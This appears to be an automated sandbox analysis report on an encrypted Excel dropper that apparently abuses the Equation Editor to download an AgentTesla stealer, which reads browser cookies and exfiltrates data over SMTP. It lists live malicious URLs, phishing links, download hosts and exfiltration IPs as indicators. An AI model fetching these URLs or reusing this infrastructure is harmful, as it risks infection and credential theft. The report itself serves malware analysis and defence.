	https://www.canva.com/design/DAEOcBy2dTg/1IjeQ8nYTzcxbMsaULT2SQ/view?utm_content=DAEOcBy2dTg&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelink	Get hash	malicious	Browse	103.153.182.184
	https://got7wco.ru/fvgt45fvdvrbtgevdc/?xujytrhamtion=456rgrfds427	Get hash	malicious	Browse	103.153.182.5
	https://got7wco.ru/fvgt45fvdvrbtgevdc/?xujytrhamtion=456rgrfds427	Get hash	malicious	Browse	103.153.182.5
	https://wtseticket.gb.net/jnhbtrvr4r/?Helmeitas23=56hbgfd3xs#jmanathenghat@phcc.gov.qa	Get hash	malicious	Browse	103.153.182.184
	ACH ADVICE ON 16-11-2020.exe	Get hash	malicious	Browse	103.152.226.83
	Additional Agreement 2020-KYC.exe	Get hash	malicious	Browse	103.152.226.83
	Scanned from a Xerox Multifunction Printer.jar	Get hash	malicious	Browse	103.153.76.172
	Scanned from a Xerox Multifunction Printer.jar	Get hash	malicious	Browse	103.153.76.172
PUBLIC-DOMAIN-REGISTRYUS	PO#21010028 - SYINDAC QT-00820_pdf.exe	Get hash	malicious	Browse	208.91.199.223
	para.exe	Get hash	malicious	Browse	208.91.199.225
	AWB 9899691012 TRACKING INFO_pdf.exe	Get hash	malicious	Browse	208.91.199.224
	para.exe	Get hash	malicious	Browse	208.91.199.224
	SIC_9827906277.pdf.exe	Get hash	malicious	Browse	208.91.198.143
	Quotation Prices.exe	Get hash	malicious	Browse	208.91.199.223
	SecuriteInfo.com.Trojan.PackedNET.519.20020.exe	Get hash	malicious	Browse	208.91.199.225
	Shipping_Details.exe	Get hash	malicious	Browse	204.11.58.28
	Request.xlsx	Get hash	malicious	Browse	103.53.40.13
	HTG-9066543.exe	Get hash	malicious	Browse	208.91.199.223
	vA0mtZ7JzJ.exe	Get hash	malicious	Browse	216.10.246.131
	New Order #21076.exe	Get hash	malicious	Browse	208.91.199.224
	k.dll	Get hash	malicious	Browse	162.215.252.76
	HTMY-209871640.exe	Get hash	malicious	Browse	208.91.198.143
	SecuriteInfo.com.Artemis707F61F6A223.exe	Get hash	malicious	Browse	208.91.199.225
	SecuriteInfo.com.Trojan.DownLoader36.37393.26064.exe	Get hash	malicious	Browse	43.225.55.205
	New order.PDF.exe	Get hash	malicious	Browse	208.91.199.224
	certificado.doc	Get hash	malicious	Browse	162.215.254.66
	SecuriteInfo.com.Mal.DocDl-K.32352.doc	Get hash	malicious	Browse	162.215.254.66
	SecuriteInfo.com.Mal.DocDl-K.460.doc	Get hash	malicious	Browse	162.215.254.66
PUBLIC-DOMAIN-REGISTRYUS	PO#21010028 - SYINDAC QT-00820_pdf.exe	Get hash	malicious	Browse	208.91.199.223
	para.exe	Get hash	malicious	Browse	208.91.199.225
	AWB 9899691012 TRACKING INFO_pdf.exe	Get hash	malicious	Browse	208.91.199.224
	para.exe	Get hash	malicious	Browse	208.91.199.224
	SIC_9827906277.pdf.exe	Get hash	malicious	Browse	208.91.198.143
	Quotation Prices.exe	Get hash	malicious	Browse	208.91.199.223
	SecuriteInfo.com.Trojan.PackedNET.519.20020.exe	Get hash	malicious	Browse	208.91.199.225
	Shipping_Details.exe	Get hash	malicious	Browse	204.11.58.28
	Request.xlsx	Get hash	malicious	Browse	103.53.40.13
	HTG-9066543.exe	Get hash	malicious	Browse	208.91.199.223
	vA0mtZ7JzJ.exe	Get hash	malicious	Browse	216.10.246.131
	New Order #21076.exe	Get hash	malicious	Browse	208.91.199.224
	k.dll	Get hash	malicious	Browse	162.215.252.76
	HTMY-209871640.exe	Get hash	malicious	Browse	208.91.198.143
	SecuriteInfo.com.Artemis707F61F6A223.exe	Get hash	malicious	Browse	208.91.199.225
	SecuriteInfo.com.Trojan.DownLoader36.37393.26064.exe	Get hash	malicious	Browse	43.225.55.205
	New order.PDF.exe	Get hash	malicious	Browse	208.91.199.224
	certificado.doc	Get hash	malicious	Browse	162.215.254.66
	SecuriteInfo.com.Mal.DocDl-K.32352.doc	Get hash	malicious	Browse	162.215.254.66
	SecuriteInfo.com.Mal.DocDl-K.460.doc	Get hash	malicious	Browse	162.215.254.66

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	1073152
Entropy (8bit):	7.4331792605351374
Encrypted:	false
SSDEEP:	12288:UEz/ihNaF49GIyUasgV3L84I3QHc4KJ77W1Do3oX/VwbN4+vtE+LtZ/NRMiWitvH:Xz/ihNaF49rgV7JFcLYo3o9wqYTfV
MD5:	411FA0337649AD03B57D223E60680397
SHA1:	9378612B41943680D24AE3E44ECDC5CFF56FD630
SHA-256:	1966492F3A7BAEB08EF6AEFA4FE27203DE08D5965B91448C503FA12B2ADE596D
SHA-512:	F26344A879041C99B8B90E5E3F97A9935FC786DB77C26D87C33763AF3E6B35C3CF23FFD5DFA5B064F5E3A8D818A0B38DC96849CC76EE8F7C97A53ABF3D0BD25D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	http://suresb1sndyintercont.dns.army/receipst/winlog.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x..`..............P.................. ........@.. ....................................@.................................L...O.......\|............................................................................ ............... ..H............text........ ...................... ..`.rsrc...\|...........................@..@.reloc...............^..............@..B........................H........C...\...............E...........................................0............(....(..........(.....o..........................( ......(!......("......(#......($....N..(....op...(%....&..(&.....s'........s(........s)........s........s+............0...........~....o,....+...0...........~....o-....+...0...........~....o.....+...0...........~....o/....+...0...........~....o0....+..&..(1.......0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\188B1E12.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9CCDB2EB.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E243FB15.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	653280
Entropy (8bit):	2.89864943318257
Encrypted:	false
SSDEEP:	3072:v34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:v4UcLe0JOqQQZR8MDdATCR3tS+jqcC
MD5:	B48EDBEDB0821DB0627C611FB9FFF7E8
SHA1:	D175A268916620C44C348EAE6F34F37DF325E404
SHA-256:	E25B5950D855CDC8C99E9C68673D90D351EA9865FB4099C79E772D4D1A34D3B6
SHA-512:	436B5F4FEAF6245A4D5FE411330ACE34B6C3892E15B8DD0FC8CFF94A9C089F0467A5AFEF3EBD7B2E2FCBAC5A037876E8FD554E6ED3C326D0CC81733E454ECAAB
Malicious:	false
Reputation:	low
Preview:	....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................".$."......."..."..N.U.."...".......".l."..N.U.."...". ....y.Q.."...". ............z.Q............................................X...%...7...................{ .@................C.a.l.i.b.r...............".X....."..."..2.Q.........."..."..{.Q......".....dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Roaming\x2nas2ex.vh2\Chrome\Default\Cookies Download File
Process:	C:\Users\Public\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.9650411582864293
Encrypted:	false
SSDEEP:	48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
MD5:	903C35B27A5774A639A90D5332EEF8E0
SHA1:	5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
SHA-256:	1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
SHA-512:	076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\x2nas2ex.vh2\Firefox\Profiles\7xwghk55.default\cookies.sqlite Download File
Process:	C:\Users\Public\vbc.exe
File Type:	SQLite 3.x database, user version 7, last written using SQLite version 3017000
Category:	dropped
Size (bytes):	524288
Entropy (8bit):	0.08107860342777487
Encrypted:	false
SSDEEP:	48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
MD5:	1138F6578C48F43C5597EE203AFF5B27
SHA1:	9B55D0A511E7348E507D818B93F1C99986D33E7B
SHA-256:	EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
SHA-512:	6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$TACSAL.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1073152
Entropy (8bit):	7.4331792605351374
Encrypted:	false
SSDEEP:	12288:UEz/ihNaF49GIyUasgV3L84I3QHc4KJ77W1Do3oX/VwbN4+vtE+LtZ/NRMiWitvH:Xz/ihNaF49rgV7JFcLYo3o9wqYTfV
MD5:	411FA0337649AD03B57D223E60680397
SHA1:	9378612B41943680D24AE3E44ECDC5CFF56FD630
SHA-256:	1966492F3A7BAEB08EF6AEFA4FE27203DE08D5965B91448C503FA12B2ADE596D
SHA-512:	F26344A879041C99B8B90E5E3F97A9935FC786DB77C26D87C33763AF3E6B35C3CF23FFD5DFA5B064F5E3A8D818A0B38DC96849CC76EE8F7C97A53ABF3D0BD25D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x..`..............P.................. ........@.. ....................................@.................................L...O.......\|............................................................................ ............... ..H............text........ ...................... ..`.rsrc...\|...........................@..@.reloc...............^..............@..B........................H........C...\...............E...........................................0............(....(..........(.....o..........................( ......(!......("......(#......($....N..(....op...(%....&..(&.....s'........s(........s)........s........s+............0...........~....o,....+...0...........~....o-....+...0...........~....o.....+...0...........~....o/....+...0...........~....o0....+..&..(1.......0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.996660916028192
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	TACSAL.xlsx
File size:	2411520
MD5:	04295ba63eaeb18f062045b0d0106670
SHA1:	daf3e6043fa67319bf7090cdc60bec6303c7f78e
SHA256:	fbc7b775eaa32cdc8daffe7a3db74bc36e06bab32b53d5d65eceb76081f664cd
SHA512:	94c2d2652ad9bc2a37779afd9e7a81db0c27e6bd3649c4d598a806ac3db522b0d2ab8afa0eae5a96e10424a18b56a31041c3c69711feebbd468f5ba58cd521e7
SSDEEP:	49152:s+xg0pV0kFwQvsRH3twbJZv3+vYv9V8preXpjcmXWWs:skgchwQvsZ3twbJZUrCHGWs
File Content Preview:	........................>...................%...................................................................................\|.......~...............z.......\|.......~...............z.......\|.......~...............z......................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "TACSAL.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 2388712

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	2388712
Entropy:	7.9999208389
Base64 Encoded:	True
Data ASCII:	. r $ . . . . . . . . . . q . H . . ' . . . . . ' . r . . . . . . . . . . Y X . 6 . c / Z s . . . 2 ^ z . * i . @ . . . . . . . . . . z . . . 9 . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . *
Data Raw:	d9 72 24 00 00 00 00 00 c2 a5 cf cf bb 71 91 48 b7 02 27 aa be 13 f9 90 27 bf 72 e9 0a d5 f8 b1 a7 f0 e2 cf c8 59 58 c9 36 97 63 2f 5a 73 88 89 98 32 5e 7a b8 2a 69 db 40 a7 a3 d6 02 f0 db ea 1f f8 c3 7a d8 d5 bc 39 c8 cf 3f 7b 6a 76 dc 2a 38 e4 c1 b9 9b 4a f7 a6 c8 cf 3f 7b 6a 76 dc 2a 38 e4 c1 b9 9b 4a f7 a6 c8 cf 3f 7b 6a 76 dc 2a 38 e4 c1 b9 9b 4a f7 a6 c8 cf 3f 7b 6a 76 dc 2a

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.58330820551
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . 1 q + 2 . . H . . . . . \| . . ` 3 h . { 9 t . . * . . 6 . . K . . . . . . ~ . . . p . . Y . . ^ _ m N B . g . . 4 . $ . . . . / z I
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/27/21-09:17:20.645015	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49166	587	192.168.2.22	208.91.199.225
01/27/21-09:17:23.479047	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49167	587	192.168.2.22	208.91.198.143

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 09:15:46.174457073 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:46.397540092 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:46.397635937 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:46.397888899 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:46.624223948 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:46.624253035 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:46.624265909 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:46.624277115 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:46.624528885 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:46.847124100 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:46.847202063 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:46.847240925 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:46.847280025 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:46.847316027 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:46.847359896 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:46.847368956 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:46.847392082 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:46.847414970 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:46.847434998 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:46.847459078 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:46.847481966 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:46.847500086 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:46.847621918 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:47.069730043 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.069772005 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.069787025 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.069798946 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.069814920 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.069830894 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.069847107 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.069864035 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.069880009 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.069895983 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.069915056 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.069931984 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.069942951 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.069955111 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.069967985 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.069983959 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.070044041 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:47.070075989 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:47.070080996 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:47.072365999 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:47.292237997 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.292292118 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.292340040 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.292383909 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.292422056 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.292463064 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.292500973 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.292505026 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:47.292525053 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:47.292527914 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:47.292536020 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.292558908 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:47.292573929 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.292584896 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:47.292610884 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.292615891 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:47.292658091 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.292670012 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:47.292700052 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.292711020 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:47.292737007 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:47.292738914 CET	49165	80	192.168.2.22	103.153.76.181
